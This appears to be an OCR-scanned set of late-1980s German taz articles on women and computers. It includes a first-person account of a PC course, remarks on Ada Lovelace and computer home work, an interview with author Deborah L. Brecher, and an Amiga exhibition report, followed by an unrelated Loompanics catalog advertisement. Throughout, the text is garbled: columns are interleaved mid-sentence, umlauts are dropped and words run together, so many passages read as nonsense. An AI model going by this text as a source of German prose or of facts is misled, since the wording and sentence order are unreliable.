In einer Talkshow wurde die neue Biidungsministerin von Schleswig-Holstein, Eva Rhmkorf (SPD), gefragt, was sie denn auerhalb ihrer Regierungsgeschfte noch machen wrde. Sie antwortete, sie 'werde sich mit Computern beschftigen, das sei ein Gebiet, das ihr bisher verschlossen geblieben sei. Obwohl sie Frauen immer ermutigt htte, sich mit High Tech anzufreunden. Und der sozialdemokratische Regierungschef Bjrn Engholm verkndete aufder Hanno ver-Messe, da er nach der Wahl Computerpraktikant werden wolle. Nicht nur mittelalterliche Politiker entdecken pltzlich, da sie mit der Zeit nicht Schritt gehalten haben, auch unsereins macht diese herbe Entdeckung. Mit sechs Mnnern und fnf Frauen lernen wir auf einem normalen PC". Ein PC" ist ein Personal-Computer, mit dem man anstndig" arbeitenkann, imGegensatzzudenHome-Computem, diekieinersind, was die Kapazitt angeht. Die Leute sind zwischen 25 und 45, die Frauen arbeitslos, die Mnner kleinere und mittlere Meister und Angestellte. zogen auf die Computerkinder1 nichts, wenn ich einen Tippfehler ER hrt andererseits nur auf kritisch beschreibt, man erfahre mache, nein, ER zwingt mich, orBefehle", stirbt", wenn der Reaktionen nur vom apparativen dentlichund sorgfltig zu sein. So Saft " fehlt und ist in der Lage, auf Gegenber, die Reaktion des lerne ich sogar endlich fehlerfrei Befehl sich etwas zu holen". ER Computers erscheine einem nicht Schreibmaschine zu schreiben! ist hochempfindlich und vertrgt subjektiv verzerrt. Die EindeuGuten Morgen, Maria", sagt keine Wrme wie die mnnlichen tigkeit der Computerlogik, die der Computer am nchsten Tag. Hoden. Byte" ist das Wort fr Unbarmherzigkeit gegenber Liebevoll streichle ich seine zarZeichen, und die Anzahl zeigt die Fehlern lassen den Rechner ten Tasten. Man braucht sie nur Kapazitt des Speichers" an. schnell zum Mastab fr Unbe- ganz leicht zu berhren, das hat er Programme" sind Anweisunstechlichkeit und Wahrheit sehr gerne. ber die bsen Mengen. Eine Anweisung ist das zur schen, die Computer-Viren herwerden." Zeit gebruchliche Betriebssystellen, lernen wir auch etwas. stem MS-DOS, das von einer Dissind ProAch, lassen wir diesen Nrgler, Computer-Viren kette in den Computer reingetan just an dieser Stelle befallt mich gramme, die andere Programme wird, damit er berhaupt was tut. einzartesGefhl von Liebefrden stren. BASIC" ist eine ProgrammierRechner. Huch, was ist das, es geht sprache fiir Anfnger. LOGO" Wie schn es sein mu, immer nicht", ruft Roland. Wer stellt ist die einfachste Sprache, die wieder gelobt zu werden. Eifrig die Software her", fragt Silke, auch ein Home-Computer verbe ich mit meinem bungsprosteht. Die Computersprache beDie Frauen stellen die grundgramm weiter.. Alle Kursteilneh- stzlicheren Fragen, die Mnner steht meist aus einsilbigen Wrmer sind guter Dinge. Wie beein- fragen nie etwas. U nd wenn unser tern, so fremd wie Science-ficflubar wir sind, wie hrig dem Computerlehrer die Antwort gibt, tion. ER versteht mich nur, wenn geschriebenen Wort gegenber; hrt man aus sechs Kehlen tiefes, ich das Richtige zur rechten Zeit dem Gert, das unsere Namen zustimmendes Brammen mache. Wenn ich etwas drcke, und kennt. Es ist alles ziemlich ein- Brabbeln, und die letzten Worte was nicht ins Programm pat, fach. Ein Apparat, der mit mir re- werden veistndnissinnig nachmacht ER nicht mit. ER ignoriert det, fordert mich zu Hchstlei- gesagt. Dabei tun sie sich' so mich. Wir lernen eine Menge ber stungen heraus. Irgendwas hat er, schwer mit der Anwendung, s i e Disketten", was formatieren" und nachder Angst vor ihm kommt vertippen sich andauernd, whist (die Diskette so herzurichten, jetzt wie bei einem ordentlichen rend meine N achbarin es blind wie da sie speichern kann), und dann Therapeuten die bertragung und mit links macht. machen wir ein Ubungsprodie Verliebtheit. gramm. Das hast du sehr gut geDer amerikanische Computermacht, Maria", lobt mich der gute wissenschaftler Joseph WeizenFnfTagelanglernenwir etwas Manchmal aber sind Punkte PC. Oh, was fhle ich mich gut. b e r I H N . E R kennt n u r richtig wichtig. Manchmal Doppel- baum berichtet in seinem B u c h Wie eindeutig ER doch ist, unbe' " 7 / J c d diszipliniert mich. Die Macht der Computer und die oder falsch. Macht man was stechlichund wahrhaftig, total obfalsch, rattert und piepst es, und S S u E tut ER nichts, auch Ohnmacht der Vernunft", da er jektiv! aufdemBildschirmweistERmich irhnnc.h so oft den richtigen aus einem Sprachanalysea pro _ streng zurecht; Unzulssiger BeS S e R tut auch gramm Eliza ein TherapieproGanz so wie Claus Eurich es befehl." Das schchtert mich ein.
i

gramm namens Doctor" entwikkelt hat. Viele praktizierende Psychiater waren begeistert. Weizenbaum stellte bestrzt fest, wie schnell und wie intensiv Personen, die sich mit Doctor" unterhielten, eine emotionale Beziehung zum Computer entwickelten. Deutlich wird aber auch das erschreckend Defizitre in der menschlichen Kommunikation und die Glubigkeit an die Maschine, nicht in ihrer blichen Funktion als Verlngerung, sondern als besserer Ersatz.

stesJHandbuch zur Oomputerprogrammierung hat sie geschrieben. Zum Beispiel diskutiert sie in ihren Anmerkungen" die Anwendung von Computern fr musikalische Kompositionen. Ihre Biografie ist schillernd und nicht bis ins Letzte hinein ergrndbar.

die Autorin von GO SJP RUN", dem ersten Computerlehrbuch fr Frauen, Deborah L. Brecker.

Frauensachen
W e r ist Ada Grfin von Lovelace? Gelebt hat sie von 1815 bis 1852, und sie hat einen franzsischen Artikel ins Englische bersetzt. Dazu hat sie umfangreiche Anmerkungen verfat. Inhalt ihrer bersetzungsarbeit war das Konzept einer analytischen Maschine" eines Herrn Charles Babbage, ein Franzose. Die Maschine war eine Rechenmaschine. Und Grfin von Lovelace hat diese Rechenmaschine nicht nur beschrieben, sie hat sie auch benutzt und sich Gedanken darber gemacht. Ihre Anmerkungen" sind nmlich nichts anderes als detaillierte Beschreibungen fr die Benutzung derMaschine. Ein frhes er-

Aber wie sehr sind Frauen eigendich von der Computerisierung betroffen? Spielen tun Mdchen so gut wie berhaupt nicht Immerhin hat sie sich um die damit. In Computercamps findet Software" verdient gemacht, man schlaue kleine Jungs, aber also um denjenigen Teil der Com- fast keine schlauen kleinen Mdputertechnik, der nicht .wie die chen. Das, was frher geHardware" anfabarist,dem At- schlechtsspezifische Spiele wamosphrischen eben, also auch ren, streng nach Jungen und Mddem traditionell Weiblichen. chen eingeteilt, findet jetzt in der In einer Sammlung von Vortr- Computerwelt ihren Niedergen und Berichten zur Tagung schlag, sie bleiben den Mdchen Naturwissenschaften und Tech- verschlossen. Da Mdchen vornik doch Fruensache" (1986) wiegend mit Mdchen spielen, fragt sich eine Arbeitsgruppe, wie fehlt der Nachahmungseffekt. Sie frau denn am besten an Computer kennen keine, dieeinen Computer gewhnt werden knnte. Und sie zu Hause hat, auch Mutter hat biskommen darauf, da Frauen sich lang keinen. In der Klasse meiner gern mit Textilien beschftigen. Tochterhaben von elf Jungen acht Frauen, die in einer Arbeits- einen Computer zu Hause, von gruppe stricken, wollen was den 14 Mdchen hat keine einen. Konkretes schaffen". Frauen So hat sich hintenrum wieder einlieben es, an Volkshochschulen mal eine geschlechtsspezifische Textilkurse zu belegen, das seien Aufteilung des Tuns, Knnens fr Frauen bekannte Bereiche. und Wissens ergeben, eines WisUnd jetzt kommen die schlauen sens, das einen erheblichen VorFrauen auf die Idee, die Compu- sprung ermglicht. tertechnikber Musterweberei an Computer, soll man sie nun verdie Frau zu bringen. Weil viele teufeln, soll man sie akzeptieren? Frauen eine Affinitt zum Weben Ist es eine Technikverweigerung, hatten und weil hier zwei Fliegen die Frauen spitze Finger am Commit einer Klappe erwischt wr- puter machen lt? Oder ist es nur den, nmlich die Nhe der Webe- die Folge des Grundsatzes, den jerei zur Frauenarbeitsgeschichte des Mdchen gelernt hat: Mdund die Auflsung der typisch chen verstehen nichts von weiblichen Technophobie". Technik?

kritischer als die befragten Mnner sehen. Sie haben Angst, d sich der Kontakt mitden Kollegen verringern knnte, da Arbeitspltze vernichtet werden knnten. Es gibt Gesundheitsbelastungen und es gibt die Kontrolle durch den Computer. Wie oft Frauen von ihrem Computerarbeitsplatz weggehen, wie oft sie telefonieren, was sie fr Nummern anwhlen, all das kann der Computer fr den Arbeitgeber ermitteln. Akkordhchstleistung kann er durch gezielte Disziplinierungen erzwingen. Dennoch: Die prinzipielle Anwendung steht nicht mehr zur Disposition.

Wie aber nimmt frau Einflu auf die Entwicklung, Gestaltung und Anwendung neuer Technologien? Frauenspezifische Computer? Das ist so albern wie der Versuch, Frauen den Computer ber das Textile nahezubringen. Den Mdchen ist das oft einfach zu blde, ein kleines Mnnchen auf dem Bildschirm hin- und herflitzen zu lassen. Inzwischen werden Schnupperkurse fr Mdchen angeboten, auch von Gewerkschaftsseite wird vorsichtig Weiterbildung betrieben. Es ist wie berallmitderMacht: Wiedereinmal sollen Frauen, um sie zu erreichen, sich etwas zu eigen machen, das dem mnnlichen Geist, der mnnlichen Herangehensweise entspricht. Die Struktur ist mnnlich, und Frauen haben sich anzulassen. Sie mssen lernen, und das geht nicht ber die Nischen In der ArbeitsgruppendiskusBekannte Strukturen und ber die Verweigerung. Was sion wurde besonders von den Informatikerinnen herausgestellt, Eine Untersuchung von 1986 fr eine Vielfachbelastung! da es sich bei der Entwicklung zeigt, da im Banken- und Versider Musterpatrone um einen Pro- cherungsbereich sechs Prozent Heimarbeit grammiervorgang handelt, da der Arbeitnehmerinnen Compu- Die Computerheimarbeit ist weivon hier aus deshalb ein Zugang ter benutzen. In der ffentlichen ter verbreitet als viele ahnen. In zur Software des Computers mg- Verwaltung und im Handel sind es der Druckindustrie sind es mehr lich ist." Also, fr wie bld halten zirka20bis25 Prozent, und insge- .als 2.000 Frauen, die zu Hause am sie die Frauen eigentlich? Soll mir samt setzen 14 Prozent Computer Computer arbeiten. Die Frauen, klammheimlich und hintenrum als Hilfsmittel fr ihre Arbeit ein. so ermittelte eine Sozialforeine Technikbeigebracht werden, Eine Brigitte-Studie hat im Jahre schungsgruppe in .Dortmund, ardie sowieso schon lngst meinen 1987 die Einstellung zrn Compu- beiten als Selbstndige. Sie beArbeitsplatz ausmacht? Sekret- ter erfragt, und dabei kam heraus, kommen einen Werkvertrag, sie rinnen sind Spezialistinnen am da 87 Prozent der befragten garantieren dem Betrieb eine mo-, Computer, ohnees zu wissen, sagt Frauen die Computerentwicklung natliche Leistung, z.B. eine Mil-

geht den Damen ein Licht auf?

lionAnschlge. I n Flautezelten ist das ganz bel, weil es dann keine Vertrge gibt.

m e n , die neue Computersysteme j einfhren wollen oder die Beratung bei Softwarevernderungen f r spezielle Systeme, Ttigkeiten

30 Frauen und 25 Mnner wur- u n d Funktionen. den fr einen Forschungsbericht Diese Arbeiten die als hherzur Computerheimarbeit befragt, qualifiziert gelten, und die unter den das Deutsche Jugendinstitut Umstnden ziemlich viel Geld, Mnchen (DJI) im vergangenen einbringen, werden zur Zeit Jahr verffentlicht hat. Danach hauptschlich von Mnnern gesind die Computerheimarbeitemacht. So fngt auch der Verrinnen sehr zufrieden. Auf die dienst der Mnner genau an der Frage, ob sie eine Arbeit auer Grenze an, wo der zur Zeit fr Hause vorzgen, antwortete die Frauen aufhrt. Frauen geben an, MehrheitmitNein. Obwohl es zu bis zu 2.000 Mark bei Vollzeit zu Stre und Problemen kommt. verdienen, Mnner machen es Viele Frauenarbeiten ja gerade zu nicht darunter, eher aber weit darHause, weil sie Familienarbeit ber,nmlichbiszu 10.000Mark. miteinbeziehen. Esstelltsichdann schnell heraus, dadieKinderstDabeiknntederComputerden ren. Dann wird nachts gearbeitet Frauen weit mehr bieten. Steht er oder streng zu den Zeiten, wo die einmal in der Wohnung, fordert er Gren auer Haus sind. Das Zu- geradezu heraus, sich mit ihm zu hausesein empfinden infolgedes- beschftigen. Austfteln, Aussen viele der Frauen als ambiva- probieren, Lernen. Die Mglichlent. So sehr ist keine daran ge- keiten, sich weiterzuqualifizieren whnt sich abzugrenzen, und sich ohne Ausbildungsnachweise und ganz diszipliniert die Zeit einzu- Zertifikate, sind in dieser Nische teilen. Auch wenn ein Drittel der auf dem Arbeitsmarkt" noch ge Frauen sich Putzhilfen leistet, ist geben. immer noch genug im Haus zu tun. Frauen \ d Mnner haben bei Hherqualifizierea? m Durch den Computer werden nophobie hinzur mutigen QualifiComputerheimarbeitwenigerGe- Frauen haben einen weiblichen 1 kation. Denn wer bestimmt heute sie herausgefordert, und sie wislegenheit, Freunde zu sehen und Lernstil, behauptet die Autorin dieBeschftigungspolitikimtech- sen, da es eine Maschine ist. Freizeitgestaltung zu betreiben. desersten Frauencomputer-Lehrnischen Bereich? Wer bestimmt, Einsame Kinder, was htten sie Bei den Frauen liegt es am zerris- buchs Deborah L. Brecher (siehe i wie und welche Computer einge- sonst heutzutage. Ich hatte Stecksenen Tag, und bei eiligen Auftr- auch Interview). Frauen lernen setzt werden? Und wer hat dann bausteine, da versuchte ich, Kaufgen, die nicht vorhersehbar sind, eherganzheitlich, wieetwas funkdie Last mit der Anwendung? Die lden und Puppenstuben draus z u bei den Mnnern aber auch unter tioniertund warum. Der Mann daPropaganda kommt einem ein bi- basteln. Es ist mir nie gelungen, Umstnden an der Computerfas- gegen drckt auf die Tasten und chen naiv vor, wennman bedenkt, und hat in mir die tiefe berzeuzination. Ein Problem zwanghaft wartet was passiert. Whrend wie hoch das Interesse gerade an gung himerlassen, da, j e mehr lsen zu wollen, auch wenn es die Frauen das Ganze verstehen wolniedrigen Arbeiten am Computer ich mich anstrenge, etwas zu leiGesundheit kostet. Mnner in der len, reicht es Mnnern, erst mal ist. BeieinerUmverteilung derge- sten, umso weniger dabei herausFamilie stellen andererseits fest, auszuprobieren, und nach und schlechtsspezifischen Computer- kommt , undeben Aufgebautes imda sie durch die Computerheim- nach zu verstehen oder auch nicht. arbeit, mten die Mnner man- mer wieder zusammenkracht. arbeit zwangslufig mehr mit ih- Grund ist die Regelorientiertheit gels besserer Angebote eben auch Nicht so das Computerkind. Zuren huslichen Lieben zu tun der Jungenspiele (Handball) im niedere" Arbeitenverrichten. Es nchst tut der Computer immer haben Gegensatz zu den Mdchenspie- wre sowieso besser, wenn sie es das, was man sagt. Er tut auch das, Die groe Zufriedenheit der !en, die prozessorientiert seien. tten, denn sie werden bekanntlich was man will, vorausgesetzt, beAuerdem fehlt Frauen im allge- nicht schwanger, In Kalifornien stimmte Regeln werden eingehalComputerheimarbeiterinnen kommt daher, da der Computer meinen die Erfahrung mit Schema- ihat man festgestellt, da Frauen, ten. Beim Steckbaukasten ist die als eine Herausforderung begrif- zeichmmgen. Sie haben in ihrer | die mehr als 20 Stunden in der W o- Zerstrungsgefahr viel grer. fen wird, die Computerheimar- Kindheit nie Flugzeugmodelle zu- che am Bildschirm arbeiten, dop- Obwohl man strikt die Regeln einbeit als eine herausfordernde T- sammenbauen mssen. In Sachen pelt so oft Fehlgeburten haben wie hlt (die Steine ineinandersteckt) tigkeit, deren Erfllung Selbstbe- Chaosproduktion sind Frauen andere Frauen. Ein Gesprch: A. ist noch lngst nicht gesagt, da aufgrund ihrer Verantwortlich- meint, Kinder an Computern wrwutsein hervorruft. Die Frauen keit im huslichen Bereich auch den kein prozessuales Denken das dabei herauskommt, was m a n kommen aus traditionellen Brovorsichtiger. Deswegen experi- mehr lernen, keine Zufalle beim sich vorgenommen hat. B e i m und Angestelltenbereichen, und mentieren sie vorsichtiger. Die Spiel, es wrde im Grunde eine Computer geht's, oder es geht die Heimarbeit kann als Protest sprichwrtliche Zaghaftigkeit Verarmung stattfinden, das Pro- nicht,undwennesnichtgeht, istes der Frauen gegen die hierarchiYon Frauen hat also einen sehr kl u- zehafte imLebenund imspieleri- nicht so schlimm, weil es j a eine schen Strukturen der Betriebe inMaschine ist. Ein Ding, von dem gen Hintergrund. schen Erfahren des Lebens vllig man immer wute, da man i h m terpretiert werden" (DJI). 63 Proverschwinden. Aber die Kinder, eigentlich nicht gewachsen ist. zent der Frauen waren vorher Im Lehrbuch von Brecher ist die Computer spielen, gucken sel- Die Bausteine dagegen sind viel erwerbsttig, 25 Prozent waren arbeitslos, und 13 Prozent waren das alles bercksichtigt. Fachaus- tener Glotze, halte ich dagegen. verletzlicher, roher, man ist viel Hausfrauen. Frauen seien mit der drcke werden erklrt. Sie nimmt Sie probieren, sie spielen Aben- zu sehr mit ihnen identifiziert. Broorganisationund Computern Analogien und Beispiele aus dem teuerspiele, in denen sie die bestens venraut, wogegen Mana- Umkreis der weiblichen Erfah- Hauptrolle haben, sie kmpfen geDieses Mnnerspielzeug, desgen eine objektive Macht", den gern eher eine Computerangst rungen (z.B. vergleicht sie mansen einziges Geheimnis ein GeComputer, an, schluendlich genachgesagt wird. Wegen dem ho- ches mit dem Backen, was einem hirn" ist, das zusammenzhlen winnt der, aber sie haben den Erhen Potential weiblieherKompe- vielleicht etwas komisch vorund vergleichen kann, das sich djfolgdes Absurden. Der Computer tenzen" sollten Frauen danach kommt, aber es sogleich auch vermonisch aufblhen lt, weil m a n stelltihnen Aufgaben,diesielsen trachten.hherqualifizierteCom- stndlicher macht). mitihnvDingetunkann.dieinanin puterttigkeiten auszuben. Beider Geschwindigkeit niemals ZielistdieAuflsungvonTech- mssen. spielsweise die Beratung von Fir-

I N T E R V I E W

Ein Computerbuch fr einen weiblichen Lernstil


Deborah L Brecher, Autorin von GO STOP RUN" pldiert fr das Verstndnis der Technologiesprache
taz: Ein Computerbuch fr einen weiblichen Lernstil. Wendest Du mit dem Schlagwortder GanzheitUchkeit" beim Lernen nicht ein Defizit von Frauen in einPositivumum?

Deborah L. Brecher: Ich denke nicht, da es ein Defizit ist. ZumBeispiel mssen alle Kinderdas Schreiben mit der rechten Hand erlernen, selbst wenn sie linkshndig sind, was nicht gut fr sie ist. Ich denke, das ist dasselbe. Frauen werden gerade im technischen Bereich mit einem Lernstil, nml ich dem nach Regelnkonfrontiert, der nicht der ihre ist, und wenden sich deshalb von der Materie ab.
Die negativen Auswirkungen des Computereinsatzes auf Frauenarbeitspltzen sind bekannt. Wo siehst Du die Chancen fr Frauen ?

Fr mich ist die groe Frage, wie die Technologie umgesetzt wird. Eigentlich sollten Computer die Wirkung haben, da die Arbeit erleichtert wird. So ist es aber gewhnlich nicht. Das heit fr mich, da die Anwendung von Computern falsch ist. Es liegt nicht an der Technologie selbst, sondern daran, wie sie umgesetzt wird. Z.B. wenn wir Technologie richtig benutzen wrden, da wrde es dann irgendwann keine Tippsen" mehr geben. Irgendwann mte die Trennung der Arbeitsberichte, da die eine tippt, was die andere sich ausgedacht hat, aufgehoben werden. Diese Trennung ist absurd, zumal jetzt schon kleine Jungen am Computer tippen lernen. Dieser Teil der Arbeit mu rckintegriert werden in dieganze Arbeit von schriftlicher Produktion, wodurch sich fr Frauen andere, interessantere Ttigkeiten erschlieen knnten, als das Tippen von Gedanken anderer.

Die Amerikaner haben sich in Schweden umgeguckt undgesehen, da siedort bessereAutosproduDu schreibst, da Du eine feministische Auffaszieren, weil die Leute dort in Teams arbeiten und das Endprodukt, was sie selber hergestellt haben, als sungvon Technik" vertrittst. Was heit dasfr Dich, Ganzes sehen. Die Amerikaner haben einerseits da- und wie knnte die sich in der Computertechnologie von gelernt, andererseits stellen sie jetzt Computer niederschlagen? Wenn du ein System entwirfst, ob es sich nun um in die Bros, wobei eine Frau den ersten Entwurf tippt, eineanderedie Korrekturen macht etc., soda Computer oder eine andere Technologie handelt, ist sie nie ein Endprodukt sehen und sagen knnen: das es wichtig, nicht nur ein Einzelteil zu sehen, sondern sich das ganze System erst vorzustellen. Es wird imhabe ich fertiggestellt. mer nur geguckt, welche Aufgabe der Computer er, Du hltst esfrwichtig, da sich mehr Frauen als -bisher mit der Computertechnologie beschftigen, fllen soll, und nicht auf diePerson geachtet, die mit

ihm arbeitet. Ein weiterer Aspekt feministischen Denkens ist, da die Beziehung der Person zum System miteinbezogen wird. Ein System sollte so entworfen sein, da es einfach ist, es dahingehend zu Die eine Frage ist die der femininen Sensibilitt verndern, da es der Person dient und nicht umgeund die andere ist fr viele Frauen einfach die Frage: kehrt. Wie kriege ich einen Job? In den USA ist es schon so, Du sprichst jetzt von der Person und dem Compuda du ohne Computerkenntnisse aus dem Rennen ter. Es betrifft ja noch einpaarandereLeuie. Du verbist. Da gibt es zwei Gruppen. Kannst du mit dem weist in Deinem Buch auf die Gefahr der OrwellComputer arbeiten, stehen dir die Tren offen, schen Big-Brother-Gesellschaft MitderEinmikannst du es nicht, gibt es fr dich die niedrigen ma- schungvonFrauenwreeseinGeschmsterprchen, nuellen Arbeiten. Fr viele Frauen ist es sehr wich- das uns berwacht. Ist Dir bei diesem Gedanken betig, die Wahl zu haben, einen einigermaen guten haglicher, oderhlstDu Frauen persefr die besseJob zu bekommen. Zum anderen Teil der Frage. Da ren Menschen, die die Realisierung dieser Horrorvigibt es eine bestimmte Art von Leuten, die keine an- sion verunmglichen ? deren Beziehungen in ihrem Leben auer der zu ihOh nein, ich unterteile Leute nicht in schwarz und rem Computer haben. Ich nenne sie Nurds, und ich wei, gut und schlecht. Wenn ich vonden Benutzern habe noch nie einen weiblichen Nurd getroffen. Ich des Systems spreche, meine ich das ganze Gebilde, denke, da Freuendem realen Leben mehr verhaftet d .h. ein System, das Informationen ber Leute speisind,und das rhrt daher, daFrauen, Mtter, Tch- chert und die gespeicherten Leute selbst sind beide ter, Schwestern sind. In den USA ist das Verhltnis Teil des Systems. Deshalb sollten die Rechte der der Tchter zu den Eltern anders als das des Sohnes Menschen respektiert werden. Ein weiterer Aspekt zu ihnen. Frauen kmmern sich mehr um ihre Bezie- feministischer Technologie: Wenn du Informatiohungen. Es gibt auch Mnner, die sich unterstt- nen ber Leute sammelst, mssen deren Rechte rezend, um Leben bemht, verhalten, aber das sind spektiert werden. Ich denke, es sollte Gesetz sein, dann meist softmen", die auch nicht viel mitTech- da, wenn jemand ber mich Informationen samnologiezutunhaben wollen. Natrlichsind nichtalle melt, solltediesePersonmireineMitteilungmachen Mnner in der Computerbranche Nurds. Aber es ist undeineKopiederlnformationenzusendenmssen. bemerkenswert, da man keine Frau findet, die sich Ich sollte das Recht haben, sie zu kennen und zu ntotal abkoppelt und als Primrbeziehung den Com- dern. Und ich sollte das Recht haben, zu sagen: Ich puterhat. Ich bin froh, wenn mehr Frauen unddiese will nicht in Deinem Computer sein. andere Sorte Mnner in diese Industrie gehen, und Ist es nicht ein bichen blauugig, an den Datenumgekehrt habe ich Angst bei der Vorstellung, da schutzzuappellieren,ohneechteKontrollmechanisall die Technologie von Leuten geschaffen und ein- men zuhaben? gesetzt wird, die Maschinen so sehr lieben. Ich denke, da es definitiv ein Gesetz geben
weil das neue elektronische Zeitalterauch die weibliche Sensibilitt reflektieren mu". Kannst Du Deine Vorstellung von weiblicher Einmischung und deren Folgen etwas verdeutlichen ?

Menschensind. Das isttypischNurd, etwas ohnehin problematisches zu machen, und es dann auch noch downtown aufzubauen. Das ist ein Denken, das Menschen nicht einbezieht. Desgleichen gibt es bestimmte Datenbanken, dienichteingerichtet werden sollten, bestimmte Informationen, die nicht im Verbund sein sollten, weil das System definitiv kaputtgehen wird, d.h. jemand bekommt Informationen, die er nicht haben sollte. Wenn alle Systeme irgendwann zusammenbrechen, ist es angebracht zu berlegen: Kann ich das Risikoeingehen, das sich aus den Konsequenzen ergibt? Du planst den Zusammenbruch in deinen Entwurf ein, und ich bin sicher, da einige Informationssysteme zwar mglich sind, aber nicht gebaut werden sollten.(...) Deswegen habe ich das Buch geschrieben, mit dem Gedanken, da wir die Technologensprache besser verstehen. Wir alle sollten diese Sprache lernen, um politisch wirksam arbeiten zu knnen.
Das Interviewfhrte Christine Engel

mte. Es gibt bestimmte Gesetze in den USA. Die Gesetze hinken der technologischen Entwicklung hinterher, aber das ist eine andere Sache. Der andere Teil feministischen Technologiedenkens ist der, da es unmglich ist, eine Maschine zu bauen, die nicht kaputt geht. Das heit man hat die Konsequenzen eines Sy stemzusammenbruchszu beachten .Wenn das beachtet wrde, wre nicht ein Nuklearreaktor 60 Kilometer entfernt von Manhattan gebaut worden, wo an einem normalen Arbeitstag 20 Millionen Deborah L. Brecher

Foto:taz-Archiv

Loompanics' Greatest Hits >


selbst machen knnte, ist letztlich Mich als Laien, beeindruckt das nur ein Verrichter verschiedener gar nicht so sehr, weil ich sowieso Ttigkeiten. davon ausgehe, da man mit Computern alles mglich machen kann. Amiga" gebe Einblick in Amiga eine ganz neue ComputerphiloVor ein paar Wochen war ich auf sophie". Lobend wird hervorgehoben, da man mit aufgersteeiner Computerausstellung in tem" Amiga ganze Bilder zerstkBerlin. Da ich keine Ahnung von Computern habe, wute ich nicht, kdn, und wieder neu zusammenum was es sich bei dieser Ausstel- setzen kann. Bunt! Man zeichnet nicht mehr, sondern man nimmt lung handelte. einen kleinen Ausschnitt auf den Monitor, macht ihn gro und Die fremde Welt teilte sich schon beim Eintritt mit. Geht man drckt ihn irgendwo drauf, so da auf eine Ausstellung und sagt, da lauter kleine Kstchen in blau', in man keine Ahnung hat? Die Jup- verschiedenen Blaus, mal eine pies an der Kasse sind freundlich. Reihe so, mal eine Reihe so, mal Schlielich bin ich eine Frau, mir bichen wei, noch drei Kstchen wird zugestanden, keine Ahnung hoch und wieder zurck, und zwei zuhaben. Eine andereorganisato- halbe rosa Kstchen, zum Rand rische Mitarbeiterin dort hat auch hin dunkler rosa, ich komme gar keine Ahnung, sie hat aber auch nicht so schnell mit, und fertig ist keine Zeit, mich herumzufhren. das blaue Auge. Amiga" ist etWir befinden uns in den Fests- was frs Grafikgewerbe. Mit len" im Berliner Arbeiterviertel Amiga kann man Filme machen, Neuklln. Hier werden sonst Po- Trickfilme. Mit zitternden Hnlitveranstaltungen von den Kom- den, weichen Knien blttere ich munisten gemacht. Der Festsaal die ganzen Geschenke noch im sieht ziemlich heruntergekom- Auto durch. Werbegeschenke, men aus, ocker-schbig mit gel- wei ich ja. Trotzdem eine Combem Lichtund armen Leuten. Hier puterzeitung, ein Buch zur Softalso das Neueste und Wunderbarware. Unverstndlich nicht ste, was es angeblich auf dem kompatibel auer einer gewisComputer-Markt gibt. Amiga" sen Umrstung". (die Freundin) heit die WunderEin Computer wie der oben bemaschine. Ist es Absicht oder Zuschriebenefrdertden Perfektiofall, da die glnzende teure Welt der Computersthetik mit ihren nismus und den Grenwahn. vielen Informationsmappen mit Man kann alles kaputt machen, kleinen Geschenken, die genauso verndern und wieder ganz maglnzen, und dem ganzen eier- chen. Die Realitt nach eigenem schalfarbenen Gert hier ber- Gutdnken verndern, das lockt haupt nicht zur Geltung kommt? Allmachtsgefhle hervor, ist Eine freundliche Dame von der schdlich fiir labile Menschen. veranstaltenden Firma Technic- Nicht alle sind labil, und warum Support in Berlin, versucht mirein sollen nicht auch Frauen ihre AllpaarDinezu erklren. Mindestens machtphantasien an einer Madreihundert Leute stehen neugie- schine wiedieserben?Gleichheit rig gebeugt vor den Gerten. Mn- fr Allmacht! Zum Schlu noch ein Zusamner, Vter und Shne, mit merkwrdig symbiotischem Gesichts- menhang: Es gibt in der Natur ausdruck. Und die meisten haben keine isoliierten Bausteine, wie es ausgebeulte Hosen und unter Ga- nochNewtondachte,sonbderndie rantie keine vollen Portemonaies. Natur ist ein kompliziertes NetzDas Neue und Bahnbrechende an werk von Zusammenhngen zwiAmiga", er (sie?) ist seit rund schen verschiedenen Strukturen, zwei Jahren auf dem Markt, ist die die ein Ganzes bilden", sagt FritMglichkeit Textund Bild per Vi- jofCapra , und das ehermoralische deokamera miteinander zu vermi- Ganzheitsbemhen der New Ageschen und das mit einem er- Bewegung mit der starken Abkehr schwinglichen Computer. Man vonrichtigoder falsch trifft haarhat eine Maus" in der Hand und genau auf die Brutalitt und Zermalt direkt auf den Computer. stckelungsfhigkeiten der Computerlogik.Mit freundlicher Genehmigung der "taz" entnommen

Articles & Features (com BOOK TAT.ILOU IX Till- WOltLI)

U l i : llliST

LOOMPANICS' GREATEST HITS The Collected Articles, Interviews and Features from The Best Book Catalog in the World Heresy, Contra-Orthodoxy, Survival, Self-Reliance, Life Extension, Privacy, Tax Avoision The Loompanics Unlimited Book Catalog has long been an indispensible information source for independent-living, independent-thinking people. Liberate Yourself First! is the Loompanics philosophy a self-reliant view often expanded upon in the articles, interviews and features that we provide between the pages and pages of self-reliance books that fill our Main Catalog. Many of our customers have inquired about the availability of these articles and features, run in past editions ol The Best Book Catalog In the World and its Supplements. Now we have collected ALL of these thought-provoking features into one big book! What kind of material an you find in this compendium of counter-culture cogitation? Just get a load of this: interviews: Barry Reid on Fake ID * Brad Steiner on Self Defense * Michael Kuzma on Mail Drops Kurt Saxon on Survival Carl Dorski on Crime * R.W. Bradford on Financial Privacy * Eddie the Wire on Locks *M. Harry on Investigative Reporting * Michael Marotta on Codes A Libertarian C.P.A. on Taxes * Burgess Laughlin on T h e Black Market. Articles: Personal Strategies for Liberty Finding a Mate * Death & Taxes: Gordon Kahl and the IRS * Using Money Orders to Protect Your Financial Privacy Gun Control as Class Warfare * The "Star Wars" Theory of National Defense * Libertarian Warfare for Fun & Profit In Praise of Vengeance * The Reasons Behind Abundance & Scarcity A N?w Look at the Declaration of Independence and the Revolutionary War. Features: Squatting on Public Land* Situationist Comics* Finding Your Place in the Sun ^Aphorisms of a Pessimist A n d More! The articles, interviews and features are arranged by topic in the following sections: * Breaking Free * Taxes Privacy * Self Defense * War & Survival * Crime and Punishment * Other Features. All in all, an amazing collection of creative ideas practical advice, and just plain fun! ' Some of the most provocative and outrageous articles arid ideas of recent years! Enjoy! LOOMPANICS' GREATEST HITS
1964, Large B'A x It, SO pp, soft cover.

Computer Lib/Dream Machines


Computer Lib/Dream Machines
